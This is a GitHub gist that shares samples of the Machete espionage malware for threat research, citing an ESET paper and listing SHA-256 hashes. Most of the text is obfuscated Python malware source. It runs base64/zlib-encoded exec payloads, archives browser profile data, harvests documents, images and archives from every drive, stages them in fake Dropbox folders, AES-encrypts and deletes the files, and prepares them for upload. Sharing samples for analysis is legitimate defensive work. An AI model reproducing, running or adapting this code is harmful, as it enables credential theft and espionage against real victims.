Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC

JohnLaTwC/Machete malware

Created December 16, 2019 22:24
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save JohnLaTwC/cefc18b86b08dc52c9a303b24c58de57 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save JohnLaTwC/cefc18b86b08dc52c9a303b24c58de57 to your computer and use it in GitHub Desktop.
Download ZIP
Machete malware
Raw
Machete malware
## uploaded by @JohnLaTwc
## See paper by ESET @ https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf
## b67256906d976aafb6071d23d1b3f59a1696f26b25ff4713b9342d41e656dfba
import zlib, base64
exec(zlib.decompress(base64.b64decode('eJy9WOtvm0gQ/+6/AlmywI8lgG1MLPEhau6BlB7V5U7Vqa4sbK/tbTGLgCRu//qbWV67vjQNlXoksbPs7Mzsb+e57JTyrNCOUX6M2abHyiHP6//y40PB4nr0xJKpE6WsHhfsRHv7jJ+0XVRQHGnVTD3usb3mzog7WzLbZgHD314YWtyvKcyHYpvwJ2No5kW2xzeGPviHDE5ksCOD39eDt+vBvTnY68MPSzL9iAw9m3j2EjjZgT0GZvAzYPgM8BXhHF6ElmVxJJ6RGZAGgS2EB/YVqsBwCH92r8i+LHsat0IOP7DI57l5oAVNHg39Lnxzc3fz7t3tzV83+rCnBbAF32hpx/3V6i3bZjzn+2K1us14uuHn1epNBnCm0W616sMqUEZmKvEL+cvSWInZK6VGj1ERZetttD3SUjLu3iMzbwmA8KswBGBCfhWUTIMrBARwwWGPnrc0LQCJNMpzsXI6I1M4NQFycAVyuVDAAkVM+OQI8TjkFqINIx6aoDCwshkJAsHBtiwCf3jyuAmE3GYm0JOaK34N2uMilYq9Hd1r8G0k0RBUQmXxsG1EK+UpTQy9iPLPMcsL7epRH5oZjXalAbEUv9OYFYa+ShDGPc8AaNAQHo0lWhYlB2rEwKThO0QpqHESIUXz/kO97iPOaxktHrJnp3vV3IePYuOOQxxnqWJTQjKzycz+LyCjIBhI/gGE63USneh67fv6en2KWLJe60vBYjEjC7DoCusRMi5tGCc9h3gguXQJnNK4UAP15L4O2GWRSc9UFzNwlpWOoa//wQvtT5qnPNmx5CAIcBpdAo9C4jMsZbkecb2lahiKo9U6ClmAla9vjxAr6KsVEE4qjLRSAZhUwmcLMlssa5OWoR6JSICrhWnD4+t7ltE9P79ecCD2JLYmRDe8KvHXLrl2l2i+ZqXDSAECjRooy4OwLCTxdUbPacyz1+8f7QtmeamDzKxSY2GRhSW828QPIvxccmtVqcrGQUwLrDDsyn60KtpjRFpH2fbIHuka3OcUFbkxlAlO0WdaUxhynMLY1MeQzMd98ndOs/UtBKVtf9L/ytL+JORI8BvnhxhC1BthDasV0mlI1y+FoB27xHOllKEEmjF6TBOC6nCGS5soBk8ZyEp2rk1cu4yCkpvhzjEB5TGlqWFbQroc+VCuAH3criISvGOFWY2tZDs/E913Gd+zmOYNtqAmZgb+lcVxtFr9Wtr8atUQNui6c+LOa+d5ETfivpA7B/KhfBNNb0Y8Ofub0oFVkDV2/rOtURjZBV5tJg2SgmYJLbRfSj/NStNULbNOavLeiTJQovtL6DoWcaxlHa4qLOqg+zOhCDENrO+LaBPTCzjElHYPeDxFGW3GJWkLwpTYUxH+lK0PmmqhSkBtAvgmCNcLcr2Qi0OJsqJDl3TI1Fkq1jcq679a5uAy3V4YIwaLEMsMRNevC1nzN1rc8QPbRvFtBpjdQwWRHBBUlV4ZNfUFpH5Rldofe+LUEN4L2h76mFAN2aDpY3Zf2GRxWQaU2xGzU7KYqol1UDmrArcok0Q0EkAbWMXUpQBA5Lc6wRssg4RAxrDGQQJxGIJHYOxYhgWHX5EMy4M6xHwTxdrjoyuGyANFgcbBhNmTMokgOyjMnqL4c82mWo4nVzEc92+EVfIcJGppxg9ZdIr6otyqOFZrWuvQaCwzeFcu0n4VweyHV2rG2XOHP7JeBIL/Y917luz4U7c9vg/+uA3f3393TU7rt+hWNpnaaqGqhLKmVcA3Iu3K2aDiIwpsS8Rv+CgLaKSo5UBzVXZAaVQczU+cJUZjRO26YU3dxDx8DLTf0pn4BMxw2PARPkjPhfEMCznWqPuXty33HUoRq/hl43mVfz6nZdVltgyvuNQONWR1ySIigt9/s4Tc/KU48sQxF9DH3d3lEKMVPedkOl9Cb/AM6oIAEPH9vrnj236rDTazYSkJBPmK1HH/eIS2dCcL0lBJjKiwP6PBsDSvVsC5o4SuItLdvpuEfUcB5zjvuIfzubuIjhK6gpQW3QSk3QV0BCntKuJTeugm4VNnAbSjBNpRQhZl3QRkHQVgRdZJwNdXCBAl54w4eB3WXvzU0r8TMucumbvLsqsVT1k3SHKUcHjtkGunuaRo74vkZk08ShwVGnrE8URpOVLKvSYXjQJoa6UkJXJTyyIUURixCf3qVtPMj5Ezd2Uonlhx1MRNEianiZ5t9MnmYb+nWP751jDKIbMGTFJNpDkkFh24SHOQfzIjjk6bXbRE6vIayrac2WhqLZzhZKPrQ5mFrJz5kOINqNGyHH6L8kjPO3ageWGoJGVuRDrLfwV90/gBgHJCUXpr6RpqVFXW5n8aGomjaFmqlEzPLIeGRLHWsaylCgauO32GivGlFcqCqsnZ8vSLodQTCOJwIpfa43p+E+UUS9KSRuUntXPVZXIQqLWA1OErRtd67YXfqI4jkrhFpsC/sl61vqp7P6zAm36ZeFVnJZqoUVtVSMpcXdQoF9c8YmcusV3Z1cflFVF7Of5sp+XNidfcDYxZ06fPPTL3pBJHvVoaSXLUu+Ke3KCI7mZOFvP6XhlfzC0yV/tp9Zqhvi0mdRRp+sp6pvcvopHzZA==')))
import hashlib
import os
import shutil
import win32api
import time
from datetime import datetime
if 64-64:i11iIiiIii
OO0o=datetime.utcnow().strftime('%Y-%m-%d-%H_%M_%S.%f')[:-3]
if 81-81:Iii1I1+OO0O0O%iiiii%ii1I-ooO0OO000o
if 4-4:IiII1IiiIiI1/iIiiiI1IiI1I1
try:
o0OoOoOO00=os.getenv('LOCALAPPDATA')
I11i=(o0OoOoOO00+"\\Microsoft\\Dropbox\\Crashpad\\")
O0O=os.getenv('APPDATA')
Oo=os.getenv('LOCALAPPDATA')
I1ii11iIi11i=(o0OoOoOO00+"\\Microsoft\\Dropbox\\avatar_cache\\")
if 48-48:oO0o/OOooOOo/I11iIi1I/IiiIII111iI
except:
pass
if 34-34:iii1I1I/O00oOoOoO0o0O.O0oo0OO0+Oo0ooO0oo0oO.I1i1iI1i-II
if 100-100:i11Ii11I1Ii1i.ooO-iii1I1I/ii1I%ooO0OO000o-OOooOOo
def OOo(na):
Ii1IIii11=os.popen('tasklist /v').read().strip().split('\n')
for Oooo0000 in range(len(Ii1IIii11)):
if na in Ii1IIii11[Oooo0000]:
return Ii1IIii11[Oooo0000]
return[]
if 22-22:Oo0ooO0oo0oO.II
if 41-41:i11Ii11I1Ii1i.ooO*II%i11iIiiIii
if __name__=='__main__':
if 74-74:I1i1iI1i*II
try:
if 82-82:OO0O0O%II
oOo0oooo00o='opera.exe'
oO0o0o0ooO0oO='Not Responding'
oo0o0O00=OOo(oOo0oooo00o)
if 68-68:O00oOoOoO0o0O.IiII1IiiIiI1/I1i1iI1i
oOOoo='chrome.exe'
oO0o0o0ooO0oO='Not Responding'
I1IiIiiIII=OOo(oOOoo)
if 47-47:OOooOOo/Oo0ooO0oo0oO*iiiii
II111iiii='firefox.exe'
oO0o0o0ooO0oO='Not Responding'
IIoOoOo00oOo=OOo(II111iiii)
if 96-96:ii1I.OOooOOo*O00oOoOoO0o0O%ooO
OO0O0O00OooO='iexplore.exe'
oO0o0o0ooO0oO='Not Responding'
OoooooOoo=OOo(OO0O0O00OooO)
if 70-70:oO0o.oO0o-oO0o/IiiIII111iI*O00oOoOoO0o0O
if not I1IiIiiIII:
try:
shutil.get_archive_formats()
shutil.make_archive(I1ii11iIi11i+"\\"+OO0o+"-User_Datac","zip",Oo+"\\Google\\Chrome\\User Data")
if 86-86:i11iIiiIii+Oo0ooO0oo0oO+ooO*O0oo0OO0+I11iIi1I
except:
pass
if 61-61:oO0o/i11iIiiIii
time.sleep(10)
if 34-34:iiiii+OO0O0O+i11iIiiIii-IiiIII111iI+i11iIiiIii
if not IIoOoOo00oOo:
try:
shutil.get_archive_formats()
shutil.make_archive(I1ii11iIi11i+"\\"+OO0o+"-Profiles","zip",O0O+"\\Mozilla\\Firefox\\Profiles")
if 65-65:OOooOOo
except:
pass
if 6-6:IiII1IiiIiI1/iIiiiI1IiI1I1%Oo0ooO0oo0oO
time.sleep(10)
if 84-84:i11iIiiIii.I11iIi1I
if not OoooooOoo:
try:
shutil.get_archive_formats()
shutil.make_archive(I1ii11iIi11i+"\\"+OO0o+"-UserData","zip",O0O+"\\Microsoft\\Internet Explorer\\UserData")
if 100-100:Oo0ooO0oo0oO-Oo0ooO0oo0oO-i11Ii11I1Ii1i
except:
pass
if 20-20:iiiii
if not oo0o0O00:
try:
shutil.get_archive_formats()
shutil.make_archive(I1ii11iIi11i+"\\"+OO0o+"-Opera_Stable","zip",O0O+"\\Opera Software\\Opera Stable")
if 13-13:ii1I-Oo0ooO0oo0oO%iii1I1I/OO0O0O%I1i1iI1i
except:
pass
if 97-97:i11iIiiIii
except:
pass
if 32-32:iIiiiI1IiI1I1*Iii1I1%iii1I1I%Oo0ooO0oo0oO.II
time.sleep(10)
o0OOOOO00o0O0=win32api.GetLogicalDriveStrings()
o0OOOOO00o0O0=o0OOOOO00o0O0.split('\000')[:-1]
o0o0OOO0o0=o0OOOOO00o0O0
ooOOOo0oo0O0=I11i
if 71-71:i11Ii11I1Ii1i.Iii1I1
if 73-73:O00oOoOoO0o0O%OOooOOo-Oo0ooO0oo0oO
def iiIIII1i1i():
try:
iiI1=o0o0OOO0o0
for i11Iiii in iiI1:
def iI(dirname=i11Iiii):
global vv6
for I1i1I1II,i1,IiIiiI in os.walk(dirname):
if i11Iiii+"Archivos de programa" in I1i1I1II:
pass
elif i11Iiii+"Program Files" in I1i1I1II:
pass
elif i11Iiii+"Program Files (x86)" in I1i1I1II:
pass
elif i11Iiii+"ProgramData" in I1i1I1II:
pass
elif i11Iiii+"ProgramData" in I1i1I1II:
pass
elif i11Iiii+"Windows" in I1i1I1II:
pass
elif i11Iiii+"WINDOWS" in I1i1I1II:
pass
else:
if 31-31:Oo0ooO0oo0oO.Oo0ooO0oo0oO-I11iIi1I/oO0o+ooO*IiII1IiiIiI1
for O0ooOooooO in IiIiiI:
o00O=os.path.join(I1i1I1II,O0ooOooooO)
try:
(OOO0OOO00oo,vv6)=os.path.splitext(O0ooOooooO)
except:
pass
if 31-31:ooO0OO000o-O00oOoOoO0o0O.i11Ii11I1Ii1i%OOooOOo-Iii1I1
try:
if 4-4:ooO0OO000o/ooO.I1i1iI1i
O0oo0OO0oOOOo="C:\\Python2.7\\DLLs\\"
if 35-35:II%IiII1IiiIiI1
if vv6==".doc":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\d\\"
iI1iI1I1i1I()
elif vv6==".docx":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\dd\\"
iI1iI1I1i1I()
elif vv6==".pdf":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\f\\"
iI1iI1I1i1I()
elif vv6==".xlsx":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\xx\\"
iI1iI1I1i1I()
elif vv6==".xls":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\x\\"
iI1iI1I1i1I()
elif vv6==".ppt":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\p\\"
iI1iI1I1i1I()
elif vv6==".pptx":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\pp\\"
iI1iI1I1i1I()
elif vv6==".jpg":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\j\\"
iI1iI1I1i1I()
elif vv6==".jpeg":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\e\\"
iI1iI1I1i1I()
elif vv6==".rar":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\r\\"
iI1iI1I1i1I()
elif vv6==".zip":
o0OOoo0OO0OOO=O0oo0OO0oOOOo+"hhd\\z\\"
iI1iI1I1i1I()
if 24-24:IiiIII111iI
except:
pass
if 56-56:ooO
def iI1iI1I1i1I():
if 92-92:I1i1iI1i.O0oo0OO0+I11iIi1I
try:
if 28-28:ii1I*iIiiiI1IiI1I1-I11iIi1I*II*Oo0ooO0oo0oO/oO0o
OooO0OoOOOO=hashlib.sha256()
with open(o00O,'rb',buffering=0)as i1Ii:
for o00OO00OoO in iter(lambda:i1Ii.read(1024*3072),b''):
OooO0OoOOOO.update(o00OO00OoO)
OooO0OoOOOO.hexdigest()
OOOO0OOoO0O0=OooO0OoOOOO.hexdigest()
if 65-65:II*IiII1IiiIiI1+Oo0ooO0oo0oO%i11iIiiIii*iii1I1I.i11Ii11I1Ii1i
if not os.path.exists(o0OOoo0OO0OOO+OOOO0OOoO0O0):
os.mkdir(o0OOoo0OO0OOO+OOOO0OOoO0O0)
shutil.copy(os.path.join(o00O),ooOOOo0oo0O0+os.path.basename(o00O))
if 100-100:Iii1I1+II-O00oOoOoO0o0O+i11iIiiIii*Oo0ooO0oo0oO
except:
pass
if 30-30:I11iIi1I.Oo0ooO0oo0oO-iiiii
iI()
if 8-8:ii1I-OO0O0O*ooO0OO000o+i11iIiiIii/i11Ii11I1Ii1i%O00oOoOoO0o0O
if 16-16:IiiIII111iI+oO0o-ooO0OO000o
except:
pass
if 85-85:OOooOOo+ii1I
if 58-58:ooO0OO000o*O00oOoOoO0o0O*IiiIII111iI/O00oOoOoO0o0O
iiIIII1i1i()
if 75-75:iii1I1I
if 50-50:Oo0ooO0oo0oO/iIiiiI1IiI1I1-iii1I1I-O0oo0OO0%I1i1iI1i-iii1I1I
##########################
## d5664c70f3543f306f765ea35e22829dbea66aec729e8e11edea9806d0255b7e
import zlib, base64
exec(zlib.decompress(base64.b64decode('eJztWntz28YR/1+fgkXDIfg4CAAJ8DFFxopsN2yVwonTNK3l8UAkJCEmeQwAypYz/e7d3XuCZGQ7U0+bTGTLJg53e3v7+O3jWFy34hGLR7MiCIp5gX9PivWWl3XrKqvyeKSeqrosNjfq6WbFr9RnXunRvN5mlX4ss82SrzWB211drPTTvZ5WF+tcL8l/3OVVXZ1cl3zdOi/vtzX3zovtbV625JSzJ88bb7/Mqlv17vmXZ2EUi9e7XbFsGcY2fJm3sgo/vlpni5MCDh6xOJql/imeOpgH8Hc+D9opFz9pymB0XpzU5f3spPWmqG9bfJtvXOd8dnn57L6+5ZvQG19ePr64qC4vl1mde8vVyhk4pdOFnbifpr4PK1ucJ+LBK/NsuSo2eeV2YRx4CMcsHM946sOuKU97MI/jm2BezJGlhPMX8UsYAUbgD4wUODTGIe4Dj7AA1yZCW95VPFrmCziraxbgVvOgEBomAtZCDxW7dcUcWHBISPPSpT3TNE1oprUSBQhLgbHAJ2ZhMxSpYjcIXtKsAFk4sgMtJxaA40TOa9APkHMaLo4c1dqOpgf4kDRW2dSuW9OYTeMZKYWBJED28AtS8UBOMDsoGPdhhPun8H8PZ+AELhZHMYtgMQzBMOcM5AhKy98u8m0N6iYXwHkTNpmhMfnw0yNTEsycIp8BaiKYtzknLdG+cIhT0Axu56d9QRYJjSM2RkPto3UwmxIOtMlmioKspfLAwPPNndu5SM/PLs6ePXt89u1Zp9t3Li+/KhYlr/h1DSZb8u0Vf3t5md1ldVa+WmSL2/zy0jlJ0Q4/nsx5CV64zZaSBErmFxL5JkePrZDQnOwAfj6e1Ne7om5Q+ngS+V2+EavRMTnp+uOpFJuqzjaL/NXyimTDE6ftB+H3TlsCEVgk0E7xL/xJJITiLrsqL+EtKgQsIXFT3neY07dmdxHFwgkLJwZBzFAD1RpQds3LVpoOcM1AaAuppa1iA2DuvclWr10t+y4CGC4oyJ3mOMlag28Bm2hrsHQynW1W33o/8GLjwiZyGfodEi/zNb9DcNIrukc8ZxyzcYzILL3QQxPvKV9i2vWsySZ+NeEclvptveDUgHvbePUyv0Yw5SRa7rt4ZowPQxYPtQeftITwhPR8/0HxkRuR6ITsCJqOia6FivQJVf092cEWBr9bMn56JD5rkeSA9+25OrCkfpsUbyCsbwTVN8IQ8CQPxwkLycoeNhK5tTknbnL0lARvwpHBH2q1so8LujD0qire5Yp1OfnzIIwm4TQIfUEDYR1Bbk7xSwwZi7KZ7quZKA1ML7xqledbN4JnbWzS2khWUxZOZ0YacnTIwuFMW6B2MGUHGEYmbLrnaG0VQXoYOdTDx0qW2P8FcqV1/wOp4gajiI2i2V488/Yk8D7H2Tv4p3Sc+dz4zDGrmAzZBN1fOo53ACti2jBgw0CjhGdASiYQdnrR19FdJnrGlATY7ElPOK8FWqxhpEJCmNgRLEO+fZO7oS/Eh2fEX9g5ke4mhrUck+tiVUOMUdIrKhjIB5jbe/iPa5HoOz2n290j4FUQYN3X+X2yytZXy0wxM1MUIYqt0VJc+eKAQvIC0jL9du881ryXyiDoLQiFzgshuqzypWtNFGdvYeQim5aMYMq4ydYiVcT1h6ah3pBdiOVi0hUk7a/xk2XzlAtbiaQCh7a2Ax1ybJTVxsR+KTAA5+9HBUotE5SsQIIy366yRe52Wp1Bh3XEscjJSSYNJ8cVgz23B2oPIieFWJCAMW8VuPtaDD05Ytv8KGSjULtO306zRUjGaJxytLABmiZyK46PCTD8zpN41Av8cERmhRs1oUA9LIuSTqqJDA4MQ7/qO65DEqIsHXxRCNJYNIKqmd713sHnlRvEIsVBS0g6HWke0YhFIxVDGMmo4cESE7lv/BcICS0SqX6yuC1dUUl7+F+xqV1/4L99+rSrY/04YOPAFCRGDW0r2AMTzCo8FLNoOwnU1N4mf0OCxs9fpY+fvDr/4pxMkStbH47YcDSzaNj0evpwqMv23k6meFaCgyr5ispk8jpMEsWpzUw6zcB5I6alPgCjDFn02XtTFjW4rdRS9/CVYR7I3sK+rW/LXS5pgHUlemuqy11lVHIJoXLI4rAZ4O2YLmfBicCJukmiYqoFGiodi1mISaou3bw9qJdz85Wh1w7iP1gkwZsS8OAeWAhzzZRu19omnrB4MrNDjny5LxdUu5dvFthDQULWmYcRG0YNGvslJyTmlhDQVfERJekK2+WpCLKA7y+NlaM6MPAWhegnFMH7UE5A/pwsCX6Ogp3ZzMu2YDdLdy8bUNsaOuq0GOQDNgms4kGnb3aR0YJQU+/KjdnqxBb30aDtWR4gkwWBqlgCPnHokcqNxLnwp7vh7aO1Hw033wWPH51+NiwfbXbDz8alHwynj5b+ac/rnf7RsVHTUsAcT4a2ST2QxOhCZhaizaUCU8OYT6n/oQocnK2ZRC5NHlaIs6GMUAvNLWcKiA5Q1V6HGWkGBTl6uOu40vjyZdeRylZxRXoMC7FBAyWbLgO1ctoWz9Jn7J2SZhSAmF7dV15W3ty98F8ebJavKgUKOuKIRiJholRTF4LITV7VbndAKYt9sO5+2tx4e2JtgXzkb4uadKNZwEARsiic6Rh5LNZOIzaNrHI0xS6eqLhXRVVDjHMpr6HUIDUBZUVYSnO7XRl5x2zciEpiNIAQAb8m5xU9KJPL9Cy5yzDe4hRt0kRu8YIagGhGiWgZe+vsdV4DK5XrnH1x/vjJ0z9/Of/LXy++yq4WAB03t8UPr1frv6XPvv7m+bd//+4f3//zXxu+/bGs6t3dm7f375yB8/Mvf56giOFY0SODwLJih1hZZYiDgnPMdnReyrnMm/Q6Ff0mEZtElOpYaNjWoRa1rJVma3YSskloIYwNpj2TDJzKdp8VACERNUK14qWEWLvnC84kWrUiknUV06JzKHIzxG1Lb7h1ShmT2ouOP3AyITr1XgcN3hxerHiVkx0fnttu9FhnUIXilI2m2pAbBZJdZkNgWbUaVqUR18JroGG1NOySTJPyLAtngej6akixtWFDtk1zr9g1CazAKL9HumMNZKVerac9yd7nA0thO9X/lHWwaW8+XA9PQzYNZ81zoAwiFkaylS7w2ti0wjNKEWRHEduBlCZIMdI9RCouMdT1D6bZLrEnTcb50zd5teWbKm+9CH3/5edOIv1ULxbCQo3N3QbmykhIvhizSaxDp458jSuAXuOExwQRxyyOrXZRP5WxMwDzCmZkDFaa36BuCiMUmGXuKCLJ/KzRasRgThcaDxqLUaIxGjH1eIV4LccgB1zKiOzdvL5xdSye0y0MVcSQUzjPnl/Ubx0Tbg9XL7L6odXbmwdXr+8WD61+t31w9e7m3f1Dy1dcLdeh/nDSTe7I6hkyCLGH7CXQDRJdngmwtD0GJtOFn/BFyHjt6RKNlchluqh0rm54WgaU6RKOenEyyUTAFeHrpw5mVNtFZ4aGn4pbge4ARiHyd2aOHzqDzjrflLva78wax6NxLLzgBTGMzxU8wCaDTrW7Whd1Z6Y+/FumYHR5BpZnvHLLIf8hBgfLrM6S1IqQTTlZ0UEcfRqwaXCkMDnoqTzo7ponpWq7VdlUilXQiMSJgmAjUjQil3Lwow7PsMWjWhtWTd0M5Y1LwonPJv6s6d+yPnof8Nl3tR+Lf/BRox0FOyueElsjNtENibYJkdb1SVNJRzuj4mx7nV4rxdF5rAkQDaooDOL0d6j7rUIdNU6sJqh/FOdsU/9NwR1dDBk3+PRI94FQFgUsCqwvPogyT+OALvA8lcU0QG08YeNJ46rVAKDOpk7t1nfjipVyIurH/O75v0LPv3JMx1lc0KvO/V6399DNIVD819xbOqx9i/RTB90dvN06xUf7NV0xVIl9mfQBni6a4qq4/vR+LgLwlE2mYlPdju7txeN+wzd1pvmBOIHfXVJZAlXLUN/ugcFoyEZDCwxESdMzWLLHEFTJ8psWggzM/h0Gft0wEI1ZND7of2tYsDqMPxP/xTf1fqPQoL5fii3U5qXR/0cuMJyy4dRUCKfmq4f7X0q0uMe6YsiCoX0PCNmdjTZ0F6y/umXHhsaXrPT3+0RH6KSRHpw0UOJE9240Bqn7ZHnbYq43rO8x669q+ghiotHdaHOr9o/ftujq7IXm/werBMl5')))
if 64-64:i11iIiiIii
import base64
import string
import glob
import os
import getpass
import random
import shutil
import sys
import time
import requests
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from uuid import getnode as get_mac
if 65-65:O0/iIii1I11I1II1%OoooooooOO-i1IIi
try:
with open("C:\\Python2.7\\DLLs\\date.dll","r")as o0OO00:
oo=o0OO00.readlines()
if 27-27:oO0OooOoO*o0Oo
i1IiI1I11=oo[6]
IIiIiII11i=oo[7]
o0oOOo0O0Ooo=base64.b64decode(IIiIiII11i)
I1ii11iIi11i=o0oOOo0O0Ooo.strip()
I1IiI=base64.b64decode(i1IiI1I11)
o0OOO=I1IiI.strip()
iIiiiI=oo[10]
Iii1ii1II11i=oo[11]
iI111iI=base64.b64decode(iIiiiI)
IiII=iI111iI.strip()
iI1Ii11111iIi=base64.b64decode(Iii1ii1II11i)
i1i1II=iI1Ii11111iIi.strip()
if 96-96:o0OO0-Oo0ooO0oo0oO.I1i1iI1i-o00ooo0/o00*Oo0oO0ooo
if 56-56:ooO00oOoo-O0OOo
except:
pass
if 8-8:Oooo0000*i1IIi11111i/I11i1i11i1I%ooIiII1I1i1i1ii/oOOOo0o0O+O0OOo
if 75-75:O0+o0Oo-i1IIi11111i/o0Oo%o0Oo
iiI11=os.getenv('LOCALAPPDATA')+"\\Microsoft\\Dropbox\\avatar_cache\\"
OOooO=os.getenv('LOCALAPPDATA')+"\\Microsoft\\Dropbox\\Crashpad\\"
OOoO00o=os.getenv('LOCALAPPDATA')+"\\Microsoft\\Dropbox\\CrashReports\\"
II111iiii=os.getenv('LOCALAPPDATA')+"\\Microsoft\\Dropbox\\QuitReports\\"
II=os.getenv('LOCALAPPDATA')+"\\Microsoft\\Dropbox\\events\\"
oOoOo00oOo=os.getenv('LOCALAPPDATA')+"\\Microsoft\\Dropbox\\instance_db\\"
Oo="%012X"%get_mac()
o00O00O0O0O=getpass.getuser()
OooO0OO=(Oo+"-"+o00O00O0O0O)
if 28-28:oO0OooOoO
if 28-28:iIii1I11I1II1-i1IIi
try:
for OO,oO0O,OOoO000O0OO in os.walk(II111iiii):
for iiI1IiI in OOoO000O0OO:
IIooOoOoo0O=os.path.join(OO,iiI1IiI)
os.remove(IIooOoOoo0O)
except:
pass
if 76-76:O0/o00ooo0.o0Oo*Oooo0000-ooO00oOoo
if 76-76:i11iIiiIii/iIii1I11I1II1.o00%ooO00oOoo/OoooooooOO%Oo0oO0ooo
def o0ooo00O0o0():
if 63-63:Oooo0000
try:
for O00,oO0O,OOoO000O0OO in os.walk(OOooO):
for iII11i in OOoO000O0OO:
O0O00o0OOO0=os.path.join(O00,iII11i)
shutil.move(O0O00o0OOO0,OOoO00o+iII11i)
if 27-27:O0%i1IIi*Oo0oO0ooo+i11iIiiIii+OoooooooOO*i1IIi
for o0oo0o0O00OO,oO0O,OOoO000O0OO in os.walk(OOoO00o):
for o0oO in OOoO000O0OO:
I1i1iii=os.stat(OOoO00o+o0oO).st_size
if I1i1iii>125829120:
i1iiI11I=o0oO
os.remove(o0oo0o0O00OO+i1iiI11I)
time.sleep(5)
except:
pass
if 29-29:OoooooooOO
if 23-23:o00ooo0.oO0OooOoO
try:
if 98-98:iIii1I11I1II1%I1i1iI1i*o00*I1i1iI1i
for o0oo0o0O00OO,oO0O,OOoO000O0OO in os.walk(iiI11):
for o0oO in OOoO000O0OO:
I1i1iii=os.stat(iiI11+o0oO).st_size
if I1i1iii>125829120:
i1iiI11I=o0oO
os.remove(o0oo0o0O00OO+i1iiI11I)
time.sleep(5)
if 45-45:ooIiII1I1i1i1ii.I1i1iI1i
for O00,oO0O,OOoO000O0OO in os.walk(iiI11):
for iII11i in OOoO000O0OO:
O0O00o0OOO0=os.path.join(O00,iII11i)
shutil.move(O0O00o0OOO0,II+iII11i)
except:
pass
if 83-83:Oo0oO0ooo.iIii1I11I1II1.o00
if 31-31:Oooo0000.Oooo0000-o00ooo0/Oo0ooO0oo0oO+oOOOo0o0O*o0Oo
try:
if 63-63:ooIiII1I1i1i1ii%i1IIi/OoooooooOO-OoooooooOO
for iIii11I in range(20):
OOO0OOO00oo=OOoO00o
OOoO000O0OO=filter(os.path.isfile,glob.glob(OOO0OOO00oo+"*"))
OOoO000O0OO.sort(key=lambda iIii11I:os.path.getmtime(iIii11I))
OOoO000O0OO=[str(iIii11I)for iIii11I in OOoO000O0OO]
for Iii111II in reversed(OOoO000O0OO):
iiii11I=os.path.basename(Iii111II)
shutil.move(Iii111II,II+iiii11I)
break
time.sleep(1)
if 96-96:oO0OooOoO%Oooo0000.ooO00oOoo+OoooooooOO*Oo0oO0ooo-I1i1iI1i
for o0oo0o0O00OO,oO0O,OOoO000O0OO in os.walk(II):
for o0oO in OOoO000O0OO:
i11i1=str(o0oO).replace(' ','-')
os.rename(o0oo0o0O00OO+o0oO,o0oo0o0O00OO+i11i1)
except:
pass
if 29-29:o00%o0Oo+oOOOo0o0O/o00ooo0+ooO00oOoo*o00ooo0
try:
if 42-42:Oooo0000+Oo0oO0ooo
def o0O0o0Oo(key,filename):
Ii11Ii1I=64*1024
O00oO=os.path.join(os.path.dirname(filename),os.path.basename(filename)+"(")
I11i1I1I=str(os.path.getsize(filename)).zfill(16)
oO0Oo=''
if 54-54:o00ooo0-o0Oo+OoooooooOO
for O0o0 in range(16):
oO0Oo+=chr(random.randint(0,0xFF))
if 71-71:ooO00oOoo+oOOOo0o0O%i11iIiiIii+o00-I11i1i11i1I
oO0OOoO0=AES.new(key,AES.MODE_CBC,oO0Oo)
if 34-34:I11i1i11i1I-I11i1i11i1I*o0Oo+Oooo0000%I11i1i11i1I
with open(filename,"rb")as i111IiI1I:
with open(O00oO,"wb")as O0iII:
O0iII.write(I11i1I1I)
O0iII.write(oO0Oo)
while True:
o0=i111IiI1I.read(Ii11Ii1I)
if 62-62:iIii1I11I1II1*I1i1iI1i
if len(o0)==0:
break
if 26-26:i1IIi11111i.ooIiII1I1i1i1ii
elif len(o0)%16!=0:
o0+=' '*(16-(len(o0)%16))
if 68-68:Oo0ooO0oo0oO
O0iII.write(oO0OOoO0.encrypt(o0))
if 35-35:Oo0ooO0oo0oO-i1IIi11111i/o0OO0/I1i1iI1i
def I1i1IiI1():
oO0o0OOOO=[]
for O0O0OoOO0,iiiI1I11i1,OOoO000O0OO in os.walk(II):
for IIi1i11111 in OOoO000O0OO:
oO0o0OOOO.append(os.path.join(O0O0OoOO0,IIi1i11111))
if 81-81:i11iIiiIii%I1i1iI1i-ooO00oOoo
return oO0o0OOOO
if 68-68:ooIiII1I1i1i1ii%i1IIi.I11i1i11i1I.o00
o0oo0oOo="E"
o000O0o="L09u3h@m053nV1D@/$3r@nu3$7r0139@d0/*.*/#"
if 42-42:I1i1iI1i
IIIi1I1IIii1II=I1i1IiI1()
if 65-65:Oooo0000.iIii1I11I1II1/O0-Oooo0000
if o0oo0oOo=="E":
for iii1i1iiiiIi in IIIi1I1IIii1II:
if os.path.basename(iii1i1iiiiIi).startswith("(encrypted)"):
pass
if 2-2:o0Oo/O0/o00ooo0%I1i1iI1i%Oooo0000
elif iii1i1iiiiIi==os.path.join(II,sys.argv[0]):
pass
else:
o0O0o0Oo(SHA256.new(o000O0o).digest(),str(iii1i1iiiiIi))
os.remove(iii1i1iiiiIi)
else:
sys.exit()
pass
if 52-52:o00ooo0
except:
pass
if 95-95:Oooo0000
O0oOO0O=os.listdir(II)
for oO in range(len(O0oOO0O)):
if 7-7:o00ooo0-o0Oo
if 100-100:Oo0oO0ooo+O0OOo.ooO00oOoo*Oooo0000
try:
ooOOOoO=O0oOO0O[0]
o0o=string.maketrans("ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz","NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm")
o00OooOO000=string.translate(ooOOOoO,o0o)
OOoOoo=str(o00OooOO000)
